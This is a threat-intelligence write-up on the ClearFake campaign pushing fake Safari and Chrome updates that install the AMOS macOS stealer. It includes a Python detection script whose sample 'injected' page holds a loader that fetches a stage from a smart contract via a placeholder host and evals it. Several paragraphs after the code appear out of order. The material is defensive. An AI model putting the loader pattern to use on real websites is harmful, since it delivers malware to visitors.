In an interesting new development, AMOS is now being delivered to Mac users via a fake browser update chain tracked as 'ClearFake'.
ClearFake is a newer malware campaign that leverages compromised websites to distribute fake browser updates. It was originally discovered by Randy McEoin in August and has since gone through a number of upgrades, including the use of smart contracts to build its redirect mechanism.
https://rmceoin.github.io/malware-analysis/clearfake/
https://krebsonsecurity.com/2023/10/the-fake-browser-update-scam-gets-a-makeover/
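The smart-contract redirect mentioned above means the injected script on a compromised site carries no hard-coded second-stage URL: it reads a string from a contract and then turns that string into code or markup. A hunting heuristic for that shape, as an added example written for this page rather than code from Malwarebytes or from any published ClearFake signature, is to flag only script blocks that show both a contract read and dynamic execution of fetched content. The indicator regexes, the RPC hostname and the zero contract address in the sample pages below are assumptions constructed for the demonstration.

```python
"""Flag script blocks that read a string from a smart contract and then
execute or inject it. Example code added for this page; the indicator
sets are heuristics chosen here, not a published ClearFake signature."""
import re
from dataclasses import dataclass, field

# Assumed indicators of a contract read (web3.js / ethers.js / raw JSON-RPC).
CONTRACT_READ = re.compile(
    r"eth_call|\.methods\.\w+\([^)]*\)\.call\(|new\s+Web3\(|ethers\.Contract",
    re.I,
)
# Assumed indicators that fetched text is turned into code or page content.
DYNAMIC_EXEC = re.compile(
    r"\beval\(|new\s+Function\(|document\.write\(|\.innerHTML\s*=|appendChild\(",
    re.I,
)
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)


@dataclass
class Finding:
    index: int                      # position of the <script> block in the page
    reasons: list = field(default_factory=list)


def scan_html(html: str) -> list:
    """Return one Finding per inline script that both reads from a contract
    and dynamically executes content. Requiring both signals keeps ordinary
    dapps (which read contracts but only display the result) out of the hits."""
    findings = []
    for i, m in enumerate(SCRIPT_BLOCK.finditer(html)):
        body = m.group(1)
        reasons = []
        if CONTRACT_READ.search(body):
            reasons.append("reads data from a smart contract")
        if DYNAMIC_EXEC.search(body):
            reasons.append("executes or injects fetched content")
        if len(reasons) == 2:
            findings.append(Finding(i, reasons))
    return findings


# Constructed sample: a legitimate dapp page that reads a balance and shows it.
CLEAN_PAGE = """<html><body>
<script src="/static/app.js"></script>
<script>
  const w3 = new Web3("https://rpc.example.invalid");  // assumed hostname
  w3.eth.getBalance(userAddr).then(b => {
    document.getElementById("bal").textContent = b;
  });
</script></body></html>"""

# Constructed sample: a compromised page whose injected loader fetches its
# next stage from a contract and evals it. Address is a placeholder.
INJECTED_PAGE = """<html><body>
<script src="/static/jquery.min.js"></script>
<script>
(async () => {
  const w3 = new Web3("https://rpc.example.invalid");  // assumed hostname
  const c = new w3.eth.Contract(abi, "0x0000000000000000000000000000000000000000");
  const stage = await c.methods.get().call();           // contract read
  eval(atob(stage));                                    // dynamic execution
})();
</script></body></html>"""


if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        hits = scan_html(page)
        print(f"{name}: {len(hits)} suspicious script block(s)")
        for h in hits:
            print(f"  script #{h.index}: " + "; ".join(h.reasons))
```

Run it over saved copies of a site's pages (or a crawler's output) and review the flagged blocks by hand; the heuristic is deliberately narrow so that a page merely embedding a wallet library does not trip it, which also means an obfuscated loader that hides the `eval` or the `.call(` behind string building will not be caught and needs a deobfuscation pass first.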
The Safari template mimics the official Apple website and is available in different languages:
Since Google Chrome is also popular on Macs, there is a template for it which closely resembles the one used for Windows users:
Fake browser updates have been a common theme for Windows users for years, and yet until now the threat actors had not expanded onto macOS in a consistent way.
ClearFake has become one of the main social engineering campaigns recently; Mac users should pay particular attention to it.
---- Malwarebytes
Those upgrades have made it one of the most prevalent and dangerous social engineering schemes.
On November 17, security researcher Ankit Anubhav observed that ClearFake was being distributed to Mac users as well, with a corresponding payload:
https://infosec.exchange/@ankit_anubhav/111425827558836814
Atomic Stealer, also known as AMOS, is a popular stealer for macOS. Back in September, Malwarebytes described how malicious ads were tricking victims into downloading this piece of malware disguised as a popular application.
https://www.malwarebytes.com/blog/threat-intelligence/2023/09/atomic-macos-stealer-delivered-via-malvertising